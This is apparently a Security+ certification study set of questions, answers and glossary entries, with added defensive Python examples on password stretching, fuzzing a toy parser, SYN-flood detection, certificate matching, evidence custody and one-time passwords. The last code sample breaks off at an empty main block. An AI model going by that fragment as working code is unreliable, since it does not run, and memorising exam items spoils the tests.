Security+


Which port and transport mechanism protocol must be opened on a firewall to allow incoming SFTP connections?

22 and TCP SFTP (Secure FTP) uses port 22 and rides on SSH to make connections. It uses TCP as the transport mechanism. Most secure connections of this sort require guaranteed, connection-oriented transmission of data—thus TCP. Port 21 is used by plain FTP, with no security. FTP also uses TCP as the transport mechanism. The answers listed might have appeared tricky at first, but if you know your protocols and associated port numbers and transport mechanisms used, you will prevail. Be sure to memorize Table 7-2 in the book!

Which of the following types of viruses hides its code to mask itself?

Armored An armored virus attempts to make disassembly difficult for an antivirus software program. It thwarts attempts at code examination. Stealth viruses attempt to avoid detection by antivirus software altogether. Polymorphic viruses change every time they run. Worms are not viruses.

Recently, your organization has experienced several password attacks. Management has asked you to provide additional security to ensure that this does not happen again. You decide to implement a key stretching function. Which of the following could you use?

Bcrypt PBKDF2 Both bcrypt and PBKDF2 are key stretching functions: each runs the password, together with a random salt, through many rounds of a hash or cipher, so that one guess costs an attacker far more work than a plain hash would. This slows brute-force and dictionary attacks against stolen password hashes. The iteration count (or bcrypt cost factor) should be raised over time as hardware gets faster.
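The following Python is an added example, not part of the original flashcard, showing the key stretching the answer describes with PBKDF2-HMAC-SHA256 from the standard library. The function names, the record format `pbkdf2_sha256$iterations$salt$hash` and the iteration count are assumptions made here, not anything the page specifies. The last function measures how the work factor changes the number of guesses an attacker can try per second.

```python
import hashlib
import hmac
import os
import time
from typing import Optional

# Assumption: an illustrative work factor. Tune it so one hash costs a noticeable
# fraction of a second on the hardware that will verify logins.
DEFAULT_ITERATIONS = 200_000


def hash_password(password: str, iterations: int = DEFAULT_ITERATIONS,
                  salt: Optional[bytes] = None) -> str:
    """Stretch a password with PBKDF2-HMAC-SHA256 and return a self-describing record.

    The record carries the algorithm, work factor and salt, so the work factor
    can be raised later without invalidating records already stored.
    """
    if salt is None:
        salt = os.urandom(16)          # fresh random salt per password
    dk = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt,
                             iterations, dklen=32)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Recompute the stretched hash from the stored salt and compare in constant time."""
    try:
        algo, iterations, salt_hex, dk_hex = record.split("$")
    except ValueError:
        return False                   # malformed record
    if algo != "pbkdf2_sha256":
        return False
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                    bytes.fromhex(salt_hex), int(iterations), dklen=32)
    return hmac.compare_digest(candidate, bytes.fromhex(dk_hex))


def guesses_per_second(iterations: int, samples: int = 20) -> float:
    """Estimate how many candidate passwords one core could test per second at
    this work factor. Higher iteration counts drive this number down, which is
    the whole point of stretching."""
    salt = b"\x00" * 16
    start = time.perf_counter()
    for i in range(samples):
        hashlib.pbkdf2_hmac("sha256", f"guess{i}".encode(), salt, iterations, dklen=32)
    elapsed = max(time.perf_counter() - start, 1e-9)
    return samples / elapsed


if __name__ == "__main__":
    record = hash_password("correct horse battery staple")
    print(record)
    print(verify_password("correct horse battery staple", record))
    print(verify_password("correct horse battery stapl", record))
    for n in (1, 1_000, 100_000):
        print(f"{n:>8} iterations: ~{guesses_per_second(n):,.0f} guesses/s per core")
```

Run it once on the machine that will verify logins and pick the largest iteration count whose latency users will tolerate; the record format lets you re-hash with a higher count on the user's next successful login.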

In the event of a short-term power loss to the server room, what should be powered on first in order to establish DNS services?

BIND server BIND stands for Berkeley Internet Name Domain. It is the most widely used DNS server on the Internet and was originally designed at the University of California at Berkeley. It normally runs on Unix systems. This would have to be booted first in order to establish DNS services; in fact, it is the only server listed that will establish DNS services in this scenario. Apache is a type of web server. Exchange is a type of e-mail server. RADIUS is an authentication server. None of these establish DNS services, unless DNS has also been loaded on those computers separately.

Which of the following is the best practice to secure log files?

Copy the log files to a server in a remote location. The best practice for securing log files is to make sure they are copied to a remote location, better yet to another server in a remote location, where they can still be accessed if the original server fails or is compromised. This remote location should be in another city, not across the street in another building. Logging all failed and successful login attempts can create gigantic log files, the kind that might be impossible to manage, so most organizations will not do this. Increasing the size of log files won't necessarily secure them, but it is a good idea when it comes to the management of log files; the default size of log files in most operating systems is not large enough for today's big organizations. Hashing log files is a good idea for maintaining their integrity, but it is not by itself the best practice; it should be used in conjunction with copying the files to a secure remote location.

Which of the following is most likely to result in data loss?

Developers copying data from production to test environments with USB sticks By default, if data is copied to a USB stick, it is not encrypted. There is virtually no security in this scenario, and the worst part is that the USB sticks are physically traveling from one department to another. To rectify the situation, the developers could consider using AES-256 to encrypt the data on the USB flash drives. The accounting personnel are using SFTP, the backup tapes are encrypted, and the back office staff is using SSH. All these other scenarios at least have some kind of security in mind.

Which of the following security technologies should you provide to allow users remote access to your network?

Firewall VPN A firewall can be used in conjunction with a virtual private network (VPN) service to allow users remote access to your network. The firewall might incorporate the VPN, or the VPN might be controlled by a separate server or concentrator. Subnetting is not necessary for remote access, but it is a security method used to compartmentalize networks. Network address translation (NAT) is used to translate LAN addresses through to the Internet. Network access control (NAC) is used to authenticate computers and users in a secure fashion on the LAN.

An attacker has identified and exploited several vulnerabilities in a closed-source application that your organization has developed. What did the attacker implement?

Fuzzing Fuzzing (fuzz testing) is the automated insertion of random data into a computer program. It is used to find vulnerabilities by the people who developed the program and by attackers. Secure code review is the analysis of source code by authorized individuals in an attempt to find problems and security issues. Vulnerability testing is a scan done on computers and networks to find their vulnerability level. Compiling is the transformation of source code, generally done to create executable programs.
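To make the idea concrete, here is an added example (not from the original flashcard) of a small mutational fuzzer in Python. The toy length-prefixed record parser, its hardened twin and the `fuzz` function are all constructed for this illustration. The buggy parser trusts the length byte, so a mutated length larger than the remaining data walks off the end of the buffer; the fuzzer finds that by trying every single-byte substitution of a valid seed input and reporting the first one that raises anything other than the parser's own validation error.

```python
from typing import Callable, Optional, Tuple


def parse_record(data: bytes) -> bytes:
    """Toy parser for a length-prefixed record: byte 0 is the payload length.

    Deliberately buggy: it trusts the length byte, so a declared length larger
    than the remaining data reads past the end (IndexError here; in C this would
    be an out-of-bounds read).
    """
    length = data[0]
    return bytes(data[1 + i] for i in range(length))


def parse_record_fixed(data: bytes) -> bytes:
    """Hardened parser: the same format, but malformed input is rejected with a
    controlled error instead of an uncontrolled crash."""
    if not data:
        raise ValueError("empty record")
    length = data[0]
    available = len(data) - 1
    if length > available:
        raise ValueError(f"declared length {length} exceeds {available} available bytes")
    return data[1:1 + length]


def fuzz(target: Callable[[bytes], object], seed: bytes,
         expected: Tuple[type, ...] = (ValueError,)) -> Optional[bytes]:
    """Single-byte mutational fuzzer.

    Every position of the seed is replaced with every other byte value. Errors
    listed in `expected` are the target's own validation errors and are not
    crashes; any other exception is, and the triggering input is returned.
    """
    for pos in range(len(seed)):
        for value in range(256):
            if value == seed[pos]:
                continue
            mutated = seed[:pos] + bytes([value]) + seed[pos + 1:]
            try:
                target(mutated)
            except expected:
                continue
            except Exception:
                return mutated
    return None


if __name__ == "__main__":
    seed = b"\x03abc"   # constructed valid record: length 3, payload "abc"
    print("buggy parser crashed on:", fuzz(parse_record, seed))
    print("fixed parser crash input:", fuzz(parse_record_fixed, seed))
```

Real fuzzers (AFL, libFuzzer) add random multi-byte mutations, coverage feedback and crash triage, but the loop above is the core idea: generate inputs the developer never thought of and watch for behaviour the parser never intended.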

James wants to set up a VPN connection between his main office and a satellite office. Which protocol should he use?

IPsec IPsec is used to secure VPN connections (such as L2TP tunnels). 802.1X specifies port-based network access control (NAC). RDP is the Remote Desktop Protocol. Telnet is used to remotely connect to other computers and routers, but it is insecure and deprecated and is not used in VPNs.

You are aware that any system in the demilitarized zone (DMZ) can be compromised because the DMZ is accessible from the Internet. What should you do to mitigate this risk?

Implement every computer on the DMZ as a bastion host. You should implement every computer on the demilitarized zone (DMZ) as a bastion host because any system on the DMZ can be compromised. A bastion host is, in essence, a system that is hardened to resist attacks: unnecessary services, accounts and software are removed, and what remains is patched and tightly configured. Being a bastion host does not depend on running any particular firewall software; it is about hardening the host itself. However, every firewall should itself be hardened like a bastion host.

What is MAC filtering a form of?

NAC MAC filtering occurs when only a select list of MAC addresses is allowed to communicate with an AP or router. This is an example of network access control (NAC), a way of controlling how computers connect to the network in a secure fashion. VPN stands for virtual private network, which allows for the secure remote connection of computers to a network. NAT stands for network address translation, which takes care of the connection from LAN clients through a router and out to the Internet. A DMZ is a demilitarized zone, a place separate from the LAN where servers reside that can be reached by users on the Internet.

You have been given the task of scanning for viruses on a PC. What is the best of the following methods?

Recovery Environment You should use a recovery environment. Most often, this would be the one built into Windows. Many manufacturers suggest using this, and more specifically Safe Mode. However, it could also be a Linux rescue disc or flash drive. That's not a true dual-boot though. An actual dual-boot is when Windows and Linux are both installed to the hard drive. Command Prompt only is not enough, nor is it necessary for some virus scanning scenarios. Booting into Windows normally is tantamount to doing nothing. Remember to use a recovery environment when scanning for viruses.

Which protocol is based on SSH?

SFTP SFTP is the SSH File Transfer Protocol (also called Secure FTP). It is an extension of the SSH protocol, which uses port 22. Contrast SFTP with FTPS. FTPS is FTP Secure or FTP-SSL, which wraps FTP in SSL/TLS rather than SSH; it uses port 990 for implicit TLS, or the standard FTP port 21 with the AUTH TLS command for explicit TLS. Plain FTP has no built-in security and is not based on SSH. TFTP is a simple version of FTP that runs over UDP port 69 and has no security either.

Your company needs to protect message integrity. Management decides that you need to implement an algorithm that uses 160-bit checksums. Which algorithm should you implement?

SHA The original Secure Hash Algorithm, SHA-1, produces 160-bit digests (checksums). The purpose of SHA is to protect message integrity. Several versions of SHA have been produced since the first 160-bit version: the SHA-2 family (SHA-224, SHA-256, SHA-384, SHA-512) and SHA-3 produce longer digests, and SHA-1 itself is now considered broken for collision resistance and should not be used in new designs. The other options are incorrect: the Advanced Encryption Standard (AES) uses 128-bit, 192-bit, and 256-bit encryption keys; the MD5 algorithm produces 128-bit checksums; and Data Encryption Standard (DES) uses 56-bit encryption keys.

You are responsible for managing the security for a network that supports multiple protocols. You need to understand the purpose of each of the protocols that are implemented on the network. Drag the protocol to its description.

SSH: A protocol that uses a secure channel to connect a server and a client SSL: A protocol that secures messages between the Application and Transport layer SCP: A protocol that allows files to be copied over a secure connection ICMP: A protocol used to test and report on path information between network devices

Which of the following misuses the Transmission Control Protocol handshake process?

SYN attack

flood guard

Security feature implemented on some firewalls to protect against SYN floods and other flooding attacks. Also known as an attack guard.
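As an added example, not part of the original flashcard, the following Python does the kind of half-open connection counting a flood guard performs, run over a constructed packet capture. The `Packet` record, `half_open_by_target`, `flood_targets` and `build_sample` are names assumed here. It counts per target server rather than per source, because a SYN flood from spoofed source addresses sends one SYN per fake address and a per-source counter would never trip.

```python
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Tuple


@dataclass(frozen=True)
class Packet:
    ts: float      # seconds into the capture
    src: str
    sport: int
    dst: str
    dport: int
    flags: str     # client-side view: "S" = SYN, "A" = final ACK of the handshake, "R" = RST


def half_open_by_target(packets: List[Packet]) -> Tuple[Dict[str, int], Dict[tuple, float]]:
    """Track connections that received a SYN but never the client's ACK.

    Returns the peak number of simultaneous half-open connections per server
    address, plus the connections still pending at the end of the capture.
    """
    pending: Dict[tuple, float] = {}          # 4-tuple -> time of the SYN
    current: Dict[str, int] = defaultdict(int)
    peak: Dict[str, int] = defaultdict(int)
    for p in sorted(packets, key=lambda p: p.ts):
        key = (p.src, p.sport, p.dst, p.dport)
        if p.flags == "S" and key not in pending:
            pending[key] = p.ts
            current[p.dst] += 1
            peak[p.dst] = max(peak[p.dst], current[p.dst])
        elif p.flags in ("A", "R") and key in pending:
            del pending[key]                   # handshake completed or aborted
            current[p.dst] -= 1
    return dict(peak), pending


def flood_targets(packets: List[Packet], threshold: int) -> set:
    """Servers whose half-open backlog exceeded the guard's threshold."""
    peak, _ = half_open_by_target(packets)
    return {dst for dst, n in peak.items() if n > threshold}


def build_sample() -> List[Packet]:
    """Constructed capture: three legitimate handshakes, then 50 spoofed SYNs at one server."""
    pkts = []
    for i, client in enumerate(["192.0.2.10", "192.0.2.11", "192.0.2.12"]):
        server = "10.0.0.5" if i < 2 else "10.0.0.6"
        pkts.append(Packet(0.0 + i * 0.01, client, 50000 + i, server, 80, "S"))
        pkts.append(Packet(0.1 + i * 0.01, client, 50000 + i, server, 80, "A"))
    for i in range(1, 51):   # spoofed sources never answer the server's SYN-ACK
        pkts.append(Packet(1.0 + i * 0.001, f"203.0.113.{i}", 40000 + i, "10.0.0.5", 80, "S"))
    return pkts


if __name__ == "__main__":
    sample = build_sample()
    peak, pending = half_open_by_target(sample)
    print("peak half-open per server:", peak)
    print("flooded (threshold 20):", flood_targets(sample, threshold=20))
    print("still half-open at end of capture:", len(pending))
```

A firewall flood guard reacts to the same signal by dropping or proxying new SYNs to the flooded target (or by using SYN cookies), which is why the threshold is set per protected server and well above its normal backlog.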

Which of the following ports is required by an e-commerce web server running SSL?

Port 443 inbound The web server needs to have inbound port 443 open to accept secure requests for SSL sessions from clients. The outbound port doesn't actually matter; it's the inbound port that is important for the server. Inbound port 80 is used by default for regular HTTP connections.

What should be incorporated with annual awareness security training?

Signing of a user agreement Security awareness training should be coupled with the signing of a user agreement. This agreement states that the user acknowledges and accepts specific rules of behavior, conduct, and nondisclosure. Some organizations might add other policies that the user must agree to as well. Security controls deal with the proper implementation of a security plan. User rights and permissions reviews are part of security audits. Succession planning is the process of identifying and preparing people to take over key roles when the current holders leave or become unavailable; it is a personnel continuity measure, not part of awareness training.

Whitelisting, blacklisting, and closing open relays are all mitigation techniques addressing what kind of threat?

Spam Closing open relays, whitelisting, and blacklisting are all mitigation techniques that address spam. Spam e-mail is a serious problem for all companies and must be filtered as much as possible.

Which of the following statements best describes a static NAT?

Static NAT uses a one-to-one mapping

PKI Components

Wildcard:Reduces the certificate management burden by allowing one certificate to be used for multiple subdomains OCSP: Checks online certificate status in real time CSR: Messages sent from a user or application to a CA to apply for a digital certificate CRL: Contains a list of certificates that have been issued and subsequently rescinded by a given CA Keep in mind that OCSP is used to validate whether trust is in place and accurate by returning responses of good, unknown, or revoked.
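The wildcard entry above hides a detail that matters in practice: a wildcard certificate does not cover every name under the domain. The following Python is an added example, not code from the original page, implementing the hostname matching rules clients apply (the strict subset of RFC 6125 that mainstream TLS libraries use). `hostname_matches` and `cert_covers` are names assumed here, and the refusal of a wildcard with fewer than two labels after it (so `*.com` is rejected) is a local policy choice, not something the flashcard states.

```python
import ipaddress
from typing import Iterable


def hostname_matches(pattern: str, hostname: str) -> bool:
    """Match a presented hostname against one certificate name.

    Rules applied (the strict subset most TLS clients implement):
      * comparison is case-insensitive, label by label;
      * a wildcard is accepted only as the entire left-most label
        (so "w*.example.com" and "www.*.com" are refused);
      * the wildcard matches exactly one label, never zero or several;
      * the wildcard must be followed by at least two labels
        (assumption: a local policy so that "*.com" is refused);
      * IP address literals are never covered by a wildcard.
    """
    pattern = pattern.lower().rstrip(".")
    hostname = hostname.lower().rstrip(".")
    if "*" not in pattern:
        return pattern == hostname
    try:
        ipaddress.ip_address(hostname)
        return False                        # wildcards never cover IP literals
    except ValueError:
        pass
    p_labels = pattern.split(".")
    h_labels = hostname.split(".")
    if p_labels[0] != "*" or "*" in pattern[1:]:
        return False                        # partial or non-leading wildcard
    if len(p_labels) < 3:
        return False                        # "*.com" would cover a whole TLD
    if len(h_labels) != len(p_labels):
        return False                        # exactly one label for the wildcard
    return h_labels[1:] == p_labels[1:]


def cert_covers(cert_names: Iterable[str], hostname: str) -> bool:
    """True if any Subject Alternative Name entry on the certificate covers hostname."""
    return any(hostname_matches(name, hostname) for name in cert_names)


if __name__ == "__main__":
    san = ["example.com", "*.example.com"]   # constructed SAN list
    for host in ["example.com", "api.example.com", "deep.api.example.com", "example.org"]:
        print(f"{host:>24}: {cert_covers(san, host)}")
```

So a single `*.example.com` certificate covers `www`, `api` and `mail` under `example.com`, but the bare apex and any deeper subdomain each need their own SAN entry; forgetting that is a common cause of "certificate name mismatch" errors after a wildcard deployment.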

Defense in Depth

The building up and layering of security measures that protect data from inception, on through storage and network transfer, and lastly to final disposal.

You are in charge of recycling computers. Some of the computers have hard drives that contain personally identifiable information (PII). What should be done to the hard drive before it is recycled?

The hard drive should be sanitized. Before a hard drive is recycled, it should be sanitized. Also known as purging, sanitizing is the removal of data in such a way that it cannot be reconstructed by any known technique. At this point the drive can be recycled within the organization or recycled with the rest of the computer. Reformatting the drive is not enough, because reformatting leaves data remanence, or data residue. Destroying the drive renders it useless, so it cannot be recycled. Storing the drive in a safe area is not recycling the drive.

NAT

The process of changing an IP address while it is in transit across a router. This is usually implemented so that one larger address space (private) can be remapped to another address space, or single IP address (public).

domain name kiting

The process of deleting a domain name during the five-day grace period (known as the add grace period, or AGP) and immediately reregistering it for another five-day period to keep a domain name indefinitely and for free.

What are the best reasons to use an HSM?

To generate keys To store keys An HSM (hardware security module) is a device that manages digital keys for cryptography. It allows for onboard secure storage of data and is used to generate and store keys. Key recovery and the transferring of keys is done by other methods. Although an HSM can be used in conjunction with a PKI, it does not have the option of storing a CRL.

You have been tasked with segmenting internal traffic between layer 2 devices on the LAN. Which of the following network design elements would most likely be used?

VLAN You would most likely use a virtual LAN (VLAN). This allows you to segment internal traffic within layer 2 of the OSI model, by using either a protocol-based scheme or a port-based scheme. The DMZ is used to create a safe haven for servers that are accessed by outside traffic. NAT is network address translation, which is a layer 3 option used on routers. Because we are dealing with a layer 2 scenario, routing in general is not necessary.

You have received several reports from users of corrupted data. You patched the affected systems but are still getting reports of corrupted data. Which of the following methods should you use to help identify the problem?

Vulnerability scan If the data is becoming corrupted more than once even after an update to the affected systems, you should perform a vulnerability scan to find out what the possible threats and vulnerabilities to those systems are. A data integrity check would simply tell you that the data has been corrupted and, therefore, that integrity is not intact. Penetration testing determines whether a system can be compromised by exploiting a particular threat. A hardware baseline review will tell you how your hardware is performing and how secure it is compared to the last baseline. Baselines are examples of vulnerability assessments, but in this case you need a software-based vulnerability assessment.

You have identified a security threat on a server, but you have decided not to exploit it. What method have you implemented?

Vulnerability scan Vulnerability scans will identify threats but not exploit them the way a penetration test might. Nothing has been mitigated in this scenario, only identified. A NIDS (network intrusion detection system) will detect malicious traffic on the network but will not find security threats on a server.

static NAT

When a single private IP address translates to a single public IP address. This is also called one-to-one mapping.

fail-open mode

When a switch broadcasts data on all ports the way a hub does.

one-to-one mapping

When an individual certificate is mapped to a single recipient.

null session

When used by an attacker, a malicious connection to the Windows interprocess communications share (IPC$).

You discover that an investigator made some mistakes during a recent forensic investigation. You need to ensure that the investigator follows the appropriate process for the collection, analysis, and preservation of evidence. Which term should you use for this process?

chain of custody Chain of custody refers to strict and organized formal procedures, in accordance with the law and the legal regulations, governing the collection, analysis, and preservation of the evidence before the evidence is produced in a court of law. In computer crimes, most of the evidence is electronic in nature and is referred to as hearsay evidence. Therefore, it is important that a clearly defined chain of custody be established to ensure the reliability and the integrity of the evidence and to make the evidence admissible in court. Chain of custody assists in identifying whether a system was properly handled during transport. Chain of custody guarantees the identity and integrity of the evidence from the collection stage to its presentation in the court of law. The following procedure is used to establish a chain of custody for evidence submission in a court: The evidence should be collected in the predefined manner by following strict and formal procedures and stating the names of the people who secured the evidence and validated it. The evidence should be marked by the investigating officer with the date, the time, and the respective case number. The evidence is sealed in a container, and the container is again marked with the same information. Writing the information on the seal is preferred because it is easier to detect any change to the evidence by examining a broken or tampered seal. The location of the evidence is also documented. The evidence is processed and analyzed by technical experts. Logs are maintained listing the people who accessed the evidence, the time at which it was accessed, and the reasons for accessing it. The prosecuting lawyer presents the evidence in the court of law to implicate the suspect.
Chain of custody applies to forensic image retention in that the chain of custody provides documentation as to who handled the evidence. When performing a forensic investigation, you should ensure that the following procedures are followed: Follow order of volatility rules. All data is volatile; more rapidly changing information should be preserved first, in this order: CPU, cache and register content; routing table, ARP cache, process table, kernel statistics; memory; temporary file system / swap space; data on hard disk; remotely logged data; data contained on archival media. Capture a system image. Ensure that appropriate forensic hashes are taken of the disk both before and after the image is taken, and of the image itself. Get copies of both a network traffic capture and logs. Ensure that the correct record time offset is obtained so that all recordings can be calibrated together. Take hashes of all files and images. Record the appropriate screenshots. Record any witnesses, including contact information. Keep track of the man hours and expense involved in the forensic process. Obtain and preserve any video capture that exists, including computer video and CCTV. Perform big data analysis. It is vital that your organization's data is not corrupted; for this purpose, you need software in place to help you analyze the data. Remember, your organization is responsible for protecting the data. During any breach or security-related event, damage and loss control must be a primary concern of the incident response. For this reason, a damage and loss control plan should be developed to ensure that further damage is not caused or allowed during an incident response. A first responder should be identified for each type of incident to ensure that proper procedures are followed. This first responder should be familiar with all incident response plans. Remember in incident response that you must consider the incident time offsets.
For example, if the incident response team has received an e-mail alert saying that a certain event occurred, it usually gives the IP address where the attack occurred and the time of the occurrence. Then, when the team analyzes the log for the affected computer, they might not be able to determine the offender if they do not factor in incident time offsets. In most server logs, you may only get login and logout entries. You will then need to use the login and logout times to determine who was logged in to the server at the time the incident occurred. This will at least give the team a starting point for determining who the attacker was.
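The "hash before and after imaging" and "log who handled the evidence" steps above fit together into a small acquisition routine. The following Python is an added example, not part of the original flashcard; the `CustodyLog` class, `acquire_image` and `verify_image` are names assumed here, and an in-memory byte string stands in for the drive being imaged. The custody log stores the item's hash with every hand-off, so a later reader can tell from the log alone whether the evidence changed between custodians.

```python
import hashlib
from datetime import datetime, timezone
from typing import Dict, List, Optional


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


class CustodyLog:
    """Append-only record of who handled an evidence item, when, and why.

    Each entry carries the item's hash at hand-off time, so integrity can be
    checked across the whole chain and not just at acquisition.
    """

    def __init__(self) -> None:
        self.entries: List[Dict[str, str]] = []

    def record(self, item_id: str, handler: str, action: str, digest: str,
               when: Optional[datetime] = None) -> None:
        when = when or datetime.now(timezone.utc)
        self.entries.append({
            "item": item_id,
            "handler": handler,
            "action": action,
            "sha256": digest,
            "utc": when.astimezone(timezone.utc).isoformat(),   # always log in UTC
        })

    def hash_chain_intact(self, item_id: str) -> bool:
        """True if every hand-off of the item reports the same hash as the first."""
        digests = [e["sha256"] for e in self.entries if e["item"] == item_id]
        return bool(digests) and all(d == digests[0] for d in digests)


def acquire_image(source: bytes, item_id: str, examiner: str,
                  log: CustodyLog, when: Optional[datetime] = None) -> bytes:
    """Image a source (here an in-memory byte string standing in for a drive).

    Hashes are taken of the source before and after imaging and of the image
    itself; if the three disagree, the acquisition cannot be trusted.
    """
    before = sha256_hex(source)
    image = bytes(source)                       # the bit-for-bit copy
    after = sha256_hex(source)
    image_hash = sha256_hex(image)
    if not (before == after == image_hash):
        raise RuntimeError("source changed during imaging or image does not match source")
    log.record(item_id, examiner, "acquired image", image_hash, when)
    return image


def verify_image(image: bytes, item_id: str, log: CustodyLog) -> bool:
    """Check an image against the hash recorded at acquisition time."""
    recorded = [e for e in log.entries
                if e["item"] == item_id and e["action"] == "acquired image"]
    return bool(recorded) and sha256_hex(image) == recorded[0]["sha256"]


if __name__ == "__main__":
    log = CustodyLog()
    image = acquire_image(b"constructed disk contents", "HDD-01", "examiner A", log)
    log.record("HDD-01", "examiner B", "received for analysis", sha256_hex(image))
    print("image verifies:", verify_image(image, "HDD-01", log))
    print("chain intact:", log.hash_chain_intact("HDD-01"))
    for entry in log.entries:
        print(entry)
```

Two points the code makes explicit: analysis is done on the verified image, never on the original, and every timestamp is normalized to UTC at write time so the record time offset problem described above does not reappear inside the custody log itself.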

Your organization has decided to implement an encryption algorithm to protect data. One IT staff member suggests that the organization use IDEA. Which strength encryption key is used in this encryption algorithm?

128-bit International Data Encryption Algorithm (IDEA) uses a 128-bit encryption key to encrypt 64-bit blocks of data. Data Encryption Standard (DES) uses a 56-bit key to encrypt 64-bit blocks of data. Some private key encryption standards support 256-bit encryption keys.

cloud computing

A way of offering on-demand services that extend the capabilities of a person's computer or an organization's network.

replay attack

An attack in which valid data transmission is maliciously or fraudulently repeated or delayed.

DNS amplification attack

An attack that initiates a DNS request with a spoofed source address. Responses (which are larger than the request) are sent to the victim server in an attempt to flood it.

CVE common vulnerabilities and exposures

An online dictionary of publicly known vulnerabilities in software, each assigned a unique identifier (CVE-YYYY-NNNN) so that scanners, vendors, and advisories can refer to the same flaw by the same name. It is maintained by the MITRE Corporation.

Which of the following fire extinguishers should be used to put out magnesium- or titanium-based metal fires?

Class D fire extinguishers are the type used for combustible metal fires such as ones that burn magnesium, titanium, and lithium. They are designated with a yellow star.

There is an important upcoming patch to be released. You are required to test the installation of the patch a dozen times before the patch is distributed to the public. What should you perform to test the patching process quickly and often?

Create a virtualized sandbox and utilize snapshots You should create a virtualized sandbox—a place where you can work with many virtualized images and test them frequently. By utilizing snapshots, you are taking limited images of the systems at a specific point, most likely before and after the patch installation. The snapshot is a set of information at a particular point in time, and not necessarily an entire image.Creating a single image of a patched PC is not enough. Good patch management requires that the security administrator do thorough testing; in the scenario you are required to test the patch a dozen times. Incremental backups are used as a part of an efficient backup plan that usually includes incremental and full backups. But this—and the fact that the PC is unpatched—does not help a security administrator to test the patching process quickly and often. A full disk image after each patch installation could be very time consuming. Instead, snapshots are the better option.

Drag the Web Site application code attack type to its mitigation.

Cross-site request forgery (CSRF): Validate both the client and server side. Cross-site scripting (XSS): Implement input validation. Session hijacking: Encrypt communications between the two parties. Malicious add-ons: Implement application white-listing.

You have found vulnerabilities in your SCADA system. Unfortunately, changes to the SCADA system cannot be made without vendor approval, which can take months to obtain. Which of the following is the best way to protect the SCADA system in the interim?

Deploy a NIPS at the edge of the SCADA network The only answer that does not require modifications to the actual SCADA (supervisory control and data acquisition) system and network is to deploy a NIPS (network intrusion prevention system) at the edge of the SCADA network. This will monitor for (and protect against) attacks on the SCADA system, but does not require that the SCADA system be modified. Installing a firewall, updating AV definitions, and enabling auditing all require modifications to the SCADA system and network. While you wait for testing to be completed and obtain vendor approval, these avenues should be explored, but not implemented.

Users are complaining that the new biometric identification system is difficult to use. They are saying that even though the initial login worked fine, they have difficulty logging in later. In addition to user training, what should you investigate?

FRR You should investigate the device's FRR to determine its accuracy. False rejection rate (FRR) measures how likely it is that an authorized user is denied access to the system. Expressed as a ratio, it is the number of authorized users who were denied access to the protected system divided by the number of authentication attempts. False rejections can occur if the system settings are too precise, or if users are not trained properly on biometric login procedures. By contrast, false acceptance rate (FAR) measures how likely it is that an unauthorized user is granted access to the system. Its ratio is the number of unauthorized users who were incorrectly allowed access to the protected system divided by the number of authentication attempts. FAR could happen because the system was not precise enough when matching the authorized user. Crossover error rate (CER) is the point where FAR and FRR are equal. Generally, a lower CER value indicates a more accurate system. CER is primarily used to compare biometric authentication systems. HOTP/TOTP are two types of one-time passwords (i.e., they can only be used once). HMAC-based One-Time Passwords (HOTP) are generated from a shared secret and an event counter, typically by a hardware token. Time-based One-Time Passwords (TOTP) derive the counter from the current time, so each code is valid only for a short time step. Once used, or once the time expires, the code is no longer valid. Other considerations include ABAC, proximity cards, smartcards, tokens, CAC, PIV, and file security. Attribute-based access control (ABAC) goes beyond authentication based on user name and password. It evaluates other factors, such as time of day and location of logons. Another aspect would be if a user has read access to files, but is attempting to edit or delete files remotely. Smartcards have permissions and access information stored on the card. The greatest concern with smart cards is theft. Once stolen, the thief can use the card in the same manner as the rightful owner.
As an example, if the user has access to a highly secure area by using the smartcard, a thief would have the same access when using the stolen card. Proximity cards are a type of smartcard that incorporate Radio Frequency Identification (RFID) chips. These chips contain authentication information and transmit over a very short range. When the authentication device is within range of the proximity card, and the information transmitted is correct, authentication is granted. Hardware tokens (or physical tokens) include such physical devices as wireless key cards, key fobs, and smart cards. Software tokens are a component of two-factor authentication systems. They are usually embedded on a device and used to authenticate the user. A Common Access Card (CAC) is a smart card issued by the Department of Defense (DoD) to military personnel and contractors. They incorporate a picture, integrated chip, two bar codes, and a magnetic strip. They can be used for visual identification and for login. A Personal Identity Verification (PIV) smart card is issued to non-military federal employees and contractors. They incorporate a picture, integrated chip, two bar codes and a magnetic strip. They can be used for visual identification and for login. File system security should always be set to only allow what is absolutely essential for the user to do their job. This is also known as the principle of least privilege.
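The HOTP and TOTP mechanisms mentioned above are short enough to implement in full. The following Python is an added example, not from the original flashcard: `hotp` follows RFC 4226 (HMAC over an 8-byte counter, then dynamic truncation) and `totp` follows RFC 6238 (the counter is the number of 30-second steps since the Unix epoch). The verification helpers and their look-ahead and drift windows are design choices assumed here; the shared secret in the demo is the one published with the RFC test vectors, so the printed codes can be checked against the standards.

```python
import hashlib
import hmac
import struct
import time
from typing import Optional


def hotp(secret: bytes, counter: int, digits: int = 6, digestmod=hashlib.sha1) -> str:
    """RFC 4226: HMAC over the big-endian 8-byte counter, dynamically truncated."""
    mac = hmac.new(secret, struct.pack(">Q", counter), digestmod).digest()
    offset = mac[-1] & 0x0F
    code = ((mac[offset] & 0x7F) << 24
            | mac[offset + 1] << 16
            | mac[offset + 2] << 8
            | mac[offset + 3])
    return str(code % 10 ** digits).zfill(digits)


def totp(secret: bytes, at: Optional[float] = None, step: int = 30,
         digits: int = 6, digestmod=hashlib.sha1) -> str:
    """RFC 6238: HOTP whose counter is the current time step."""
    if at is None:
        at = time.time()
    return hotp(secret, int(at) // step, digits, digestmod)


def verify_hotp(secret: bytes, code: str, counter: int, look_ahead: int = 5,
                digits: int = 6) -> Optional[int]:
    """Validate an event-based code, tolerating a token pressed a few times
    without logging in. Returns the next counter to store, or None on failure.
    The server must never accept this or an earlier counter again."""
    for c in range(counter, counter + look_ahead + 1):
        if hmac.compare_digest(hotp(secret, c, digits), code):
            return c + 1
    return None


def verify_totp(secret: bytes, code: str, at: float, step: int = 30,
                window: int = 1, digits: int = 6) -> bool:
    """Validate a time-based code, allowing `window` steps of clock drift each way."""
    t = int(at) // step
    return any(hmac.compare_digest(hotp(secret, t + d, digits), code)
               for d in range(-window, window + 1))


if __name__ == "__main__":
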